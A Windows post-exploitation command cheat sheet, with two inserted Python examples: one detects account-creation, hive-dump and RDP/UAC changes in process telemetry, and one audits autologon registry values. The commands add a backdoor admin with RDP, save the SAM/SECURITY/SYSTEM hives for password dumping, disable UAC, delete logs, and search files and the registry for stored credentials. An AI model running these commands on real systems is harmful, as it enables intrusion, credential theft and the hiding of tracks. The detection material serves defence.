Add Admin User w/ RDP

net user <username> <password> /ADD
net localgroup administrators <username> /ADD
net localgroup "Remote Desktop Users" <username> /ADD

Remove User

net user badaccount /del

Tasks / Services

Start or stop a service

net start|stop servicename

View the currently running tasklist

tasklist
Kill a task by name

taskkill /F /IM task.exe

Kill a task by PID

taskkill /PID PID /F

Base64 encoding / decoding

Base64 encode

certutil -encode inputfile outputfile

Base64 decode

certutil -decode inputfile outputfile

Dump passwords via reg.exe

reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system

Security settings

Allow RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable UAC (Meterpreter reg command syntax)

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system
reg setval -v EnableLUA -d 0 -t REG_DWORD -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system

Refresh policies

gpupdate /force

Disable the Firewall (note: the command given here repeats the Allow RDP registry change)

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
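The sequences listed so far (creating a local account and adding it to Administrators or Remote Desktop Users, saving the SAM/SECURITY/SYSTEM hives with reg.exe, and setting fDenyTSConnections or EnableLUA to 0) are exactly what a detection engineer looks for in process-creation telemetry. The script below is an added example, not part of the original cheat sheet: it runs a handful of regex rules over the CommandLine field as it would arrive from Security event 4688 (with command-line auditing enabled) or Sysmon event 1, and correlates account creation with privileged-group membership. The rule names, the helper names and the SAMPLE_CMDLINES list are my own constructions.

```python
"""Flag the account-creation, hive-dump and RDP/UAC registry changes from this
cheat sheet in Windows process-creation command lines.

Added example, not part of the original cheat sheet.  Input is the
CommandLine field of Security 4688 / Sysmon 1 events; here it is the
constructed SAMPLE_CMDLINES list.
"""
import re

# Named groups pull out the account name so creation and group membership can
# be correlated.  cmd.exe is case-insensitive (re.I), and net.exe hands off to
# net1.exe, so both binary names are matched.
CREATE_USER = re.compile(
    r"\bnet1?(\.exe)?\s+user\s+(?P<acct>\S+)\s+\S+\s+/add\b", re.I)
ADD_TO_GROUP = re.compile(
    r'\bnet1?(\.exe)?\s+localgroup\s+"?(administrators|remote desktop users)"?'
    r"\s+(?P<acct>\S+)\s+/add\b", re.I)
HIVE_SAVE = re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.I)
RDP_ENABLE = re.compile(r"\bfDenyTSConnections\b.*\s/d\s+0\b", re.I)
UAC_DISABLE = re.compile(r"\bEnableLUA\b.*(?:/d|-d)\s+0\b", re.I)

RULES = [
    ("local_account_created", CREATE_USER),
    ("added_to_admins_or_rdp_group", ADD_TO_GROUP),
    ("registry_hive_saved", HIVE_SAVE),
    ("rdp_enabled_via_registry", RDP_ENABLE),
    ("uac_disabled_via_registry", UAC_DISABLE),
]

SAMPLE_CMDLINES = [  # constructed sample telemetry, not from a real host
    r"C:\Windows\system32\net1 user svc_backup P@ssw0rd! /ADD",
    r"net localgroup administrators svc_backup /ADD",
    r'net localgroup "Remote Desktop Users" svc_backup /ADD',
    r"reg.exe save hklm\sam c:\sam_backup",
    r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r"C:\Windows\system32\svchost.exe -k netsvcs -p",
    r"net user",  # plain enumeration without /add: must not fire
]


def classify(cmdline):
    """Names of every rule that matches one command line."""
    return [name for name, pat in RULES if pat.search(cmdline)]


def scan(lines):
    """[(cmdline, [rule names])] for every line that trips at least one rule."""
    return [(line, classify(line)) for line in lines if classify(line)]


def new_privileged_accounts(lines):
    """Accounts both created and added to Administrators / Remote Desktop Users
    in the same batch, i.e. the complete 'Add Admin User w/ RDP' sequence."""
    created = {m.group("acct").lower() for l in lines if (m := CREATE_USER.search(l))}
    granted = {m.group("acct").lower() for l in lines if (m := ADD_TO_GROUP.search(l))}
    return sorted(created & granted)


if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(names):32} {line}")
    print("new privileged accounts:", new_privileged_accounts(SAMPLE_CMDLINES))
```

The single-line rules are cheap to run per event; the correlation in `new_privileged_accounts` is what turns two low-severity events into one high-confidence alert, and the same approach extends to the `/del` and `gpupdate /force` entries if they matter in your environment.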

Services status

sc queryex type= service state= all
netstat -ano

Start & stop a service:

sc start <SERVICE NAME>
sc stop <SERVICE NAME>

Reading values from registry

C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Interesting files

%WINDIR%\repair\software, %WINDIR%\repair\security

List logs

wevtutil el

Delete Logs

del *.log /a /s /q /f

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g. *pass*)

dir /s *pass* == *key* == *vnc* == *.config*

The above also looks for key, vnc and config.

Only in certain files…

findstr /si pass *.xml *.ini *.txt

Grep Registries…

reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

WiFi Clear Text Passwords

netsh wlan show profile

Interesting Registries

reg query "HKCU\Software\ORL\WinVNC3\Password" [VNC]

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" [Windows]
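The Winlogon query above is equally useful on the defensive side: a hardening review should confirm that no host has AutoAdminLogon switched on with a DefaultPassword sitting in the registry as a clear-text REG_SZ (the Sysinternals Autologon tool stores it as an LSA secret instead). The following is an added example, not part of the original cheat sheet: a Python parser for the text that `reg query` prints, followed by an audit of the parsed values. The REG_QUERY_OUTPUT block is a constructed sample, and the function names are my own.

```python
"""Audit a Winlogon 'reg query' dump for clear-text autologon credentials.

Added example, not part of the original cheat sheet.  It parses the output of
  reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
and reports whether AutoAdminLogon is enabled and whether a DefaultPassword
value is present.  REG_QUERY_OUTPUT is a constructed sample, not a real host.
"""
import re

REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    svc_kiosk
    DefaultDomainName    REG_SZ    CORP
    DefaultPassword    REG_SZ    Summer2024!
    Shell    REG_SZ    explorer.exe
    AutoRestartShell    REG_DWORD    0x1
"""

# Value lines are indented and use runs of spaces (reg.exe prints four) between
# name, type and data; key-path lines are unindented and therefore skipped.
VALUE_LINE = re.compile(r"^\s+(\S+)\s{2,}(REG_\w+)\s{2,}(.*)$")


def parse_reg_query(text):
    """Return {value_name: (type, data)} from reg query output.

    Only the first two separators are significant, so value data that itself
    contains spaces survives intact.
    """
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            name, vtype, data = m.groups()
            values[name] = (vtype, data.rstrip())
    return values


def audit_autologon(values):
    """Return a list of finding strings; an empty list means nothing to fix."""
    findings = []
    autologon = values.get("AutoAdminLogon", ("", "0"))[1].strip()
    if autologon == "1":
        user = values.get("DefaultUserName", ("", "<unset>"))[1]
        domain = values.get("DefaultDomainName", ("", ""))[1]
        account = f"{domain}\\{user}" if domain else user
        findings.append(f"AutoAdminLogon is enabled for {account}")
    if "DefaultPassword" in values:
        # The value is readable by any local user; the LSA-secret form used by
        # the Sysinternals Autologon tool does not appear here at all.
        findings.append("DefaultPassword is stored as a clear-text REG_SZ value")
    return findings


if __name__ == "__main__":
    parsed = parse_reg_query(REG_QUERY_OUTPUT)
    for finding in audit_autologon(parsed) or ["no autologon findings"]:
        print(finding)
```

Pipe real `reg query` output into `parse_reg_query` (for example from a remote collection job) and treat any non-empty result from `audit_autologon` as a finding to remediate; the parser is generic enough to reuse on the other `reg query` entries on this page.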

SNMP Parameters

reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" [SNMP PARAMS]

PuTTY sessions

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" [Putty Plaintext Credentials]

Search for password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s